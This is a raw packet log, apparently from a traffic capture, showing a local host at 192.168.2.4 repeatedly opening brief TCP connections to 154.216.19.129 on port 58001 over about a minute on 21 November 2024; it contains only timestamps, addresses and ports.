                                                                  Nov 21, 2024 02:59:08.024216890 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.024363041 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.127183914 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.143799067 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.249114037 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.249223948 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.250066042 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.369503975 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.369565964 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.489022017 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.654086113 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.654160023 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.654309034 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.767433882 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.773756981 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.886934996 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.887029886 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.887978077 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:10.007566929 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:10.007637978 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:10.127247095 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.244595051 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.244746923 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.244798899 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.361028910 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.364229918 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.480468988 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.480571985 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.481573105 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.600948095 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.601413012 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.720808983 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.792947054 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.793349981 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:12.795001984 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:12.914378881 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.954863071 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.074323893 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:13.074399948 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.075120926 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.194601059 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:13.194797993 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.314250946 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.432169914 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.432225943 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.432368994 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.548695087 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.551748037 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.668467999 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.668555021 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.669224024 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.788645029 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.788698912 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.908273935 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.029027939 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.029078960 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.029259920 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.142337084 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.148695946 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.261812925 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.261909008 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.263026953 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.382477045 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.382541895 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.501977921 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.665210009 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.665420055 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.669367075 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.767379045 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.788872004 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.887001038 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.887501955 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.887890100 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:18.007376909 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:18.007541895 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:18.127453089 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.244167089 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.244263887 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.244415998 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.361417055 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.363852978 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.481107950 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.481208086 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.482122898 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.601551056 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.601625919 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.721122026 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:20.889522076 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:20.889653921 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:20.889786005 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.001813889 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.009186029 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.121326923 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.121424913 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.122379065 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.241770029 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.241827965 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.361252069 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.439981937 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.440067053 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.440200090 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.548650026 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.559592009 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.668086052 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.668252945 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.669125080 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.788516998 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.788578033 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.907977104 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:23.979026079 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:23.979101896 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:23.979355097 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.095561028 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.098835945 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.215121984 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.215255976 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.215960979 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.335370064 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.335436106 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.454961061 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.745150089 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.745300055 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.745345116 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.861375093 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.864826918 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.980906010 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.981035948 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.981766939 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:26.101229906 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:26.101309061 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:26.220792055 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.338984966 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.339082956 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.339242935 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.455010891 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.460058928 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.574489117 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.574620008 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.575249910 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.694674969 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.694753885 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.814186096 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:28.978099108 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:28.980168104 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:28.980413914 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.095599890 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.099834919 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.215006113 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.215127945 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.215878010 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.335304022 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.335438967 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.454860926 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.619853973 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.619946957 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.620104074 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.736309052 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.739492893 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.855806112 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.856085062 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.856590033 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.976015091 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.976108074 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:31.095613003 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.212747097 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.212858915 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.213051081 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.329895020 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.332504988 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.449389935 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.449520111 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.450386047 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.569818020 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.569936037 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.689908028 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:33.849682093 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:33.849746943 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:33.849968910 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:33.955388069 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.089601994 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.089857101 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.089955091 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.090742111 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.210630894 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.210763931 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.330172062 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.494399071 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.494498968 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.494668961 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.611222029 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.614043951 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.730683088 CET5800149849154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.730813026 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.731532097 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.850950956 CET5800149849154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.851130009 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:35.970633984 CET5800149849154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:37.088238955 CET5800149849154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:37.088440895 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.088499069 CET4984958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.206465006 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.208030939 CET5800149849154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:37.325942039 CET5800149855154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:37.326025963 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.326886892 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.446332932 CET5800149855154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:37.446552992 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:37.565999985 CET5800149855154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:38.685887098 CET5800149855154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:38.686008930 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:38.686225891 CET4985558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:38.798738956 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:38.805665970 CET5800149855154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:38.918230057 CET5800149859154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:38.918421984 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:38.919071913 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:39.038485050 CET5800149859154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:39.038606882 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:39.158384085 CET5800149859154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:40.235064983 CET5800149859154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:40.235147953 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.235270023 CET4985958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.345487118 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.354691982 CET5800149859154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:40.464978933 CET5800149862154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:40.465094090 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.465898991 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.585295916 CET5800149862154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:40.585444927 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:40.704895973 CET5800149862154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:41.826867104 CET5800149862154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:41.827034950 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:41.827197075 CET4986258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:41.939286947 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:41.946723938 CET5800149862154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:42.058758974 CET5800149868154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:42.058964968 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:42.059632063 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:42.185075045 CET5800149868154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:42.185189962 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:42.394604921 CET5800149868154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:43.466793060 CET5800149868154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:43.466943979 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.467113018 CET4986858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.579978943 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.586499929 CET5800149868154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:43.700248003 CET5800149874154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:43.700356007 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.701037884 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.820483923 CET5800149874154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:43.820626974 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:43.940226078 CET5800149874154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:45.055550098 CET5800149874154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:45.055612087 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.056160927 CET4987458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.173724890 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.175605059 CET5800149874154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:45.293201923 CET5800149875154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:45.293332100 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.294200897 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.413615942 CET5800149875154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:45.413686991 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:45.533174992 CET5800149875154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:46.618340015 CET5800149875154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:46.618458986 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:46.618634939 CET4987558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:46.720597982 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:46.738121033 CET5800149875154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:46.840138912 CET5800149881154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:46.840236902 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:46.841063023 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:46.960500002 CET5800149881154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:46.960606098 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:47.080087900 CET5800149881154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:48.198160887 CET5800149881154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:48.198390961 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.198558092 CET4988158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.314405918 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.317984104 CET5800149881154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:48.434326887 CET5800149887154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:48.434417009 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.435348034 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.554855108 CET5800149887154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:48.554959059 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:48.674498081 CET5800149887154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:49.744313955 CET5800149887154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:49.744400024 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:49.744569063 CET4988758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:49.861243010 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:49.863950968 CET5800149887154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:49.980735064 CET5800149889154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:49.980829954 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:49.981554985 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:50.100989103 CET5800149889154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:50.101062059 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:50.220576048 CET5800149889154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:51.343379974 CET5800149889154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:51.343470097 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.343687057 CET4988958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.455332994 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.463088989 CET5800149889154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:51.574932098 CET5800149894154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:51.575057030 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.575891972 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.695395947 CET5800149894154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:51.695465088 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:51.814968109 CET5800149894154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:52.885250092 CET5800149894154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:52.885315895 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:52.885459900 CET4989458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:53.001914024 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:53.004895926 CET5800149894154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:53.121395111 CET5800149900154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:53.121509075 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:53.122311115 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:53.241751909 CET5800149900154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:53.241832972 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:53.361274004 CET5800149900154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:54.442740917 CET5800149900154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:54.442799091 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:54.442960024 CET4990058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:54.548707008 CET4990458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:54.562376022 CET5800149900154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:54.668216944 CET5800149904154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:54.668317080 CET4990458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:54.669055939 CET4990458001192.168.2.4154.216.19.129
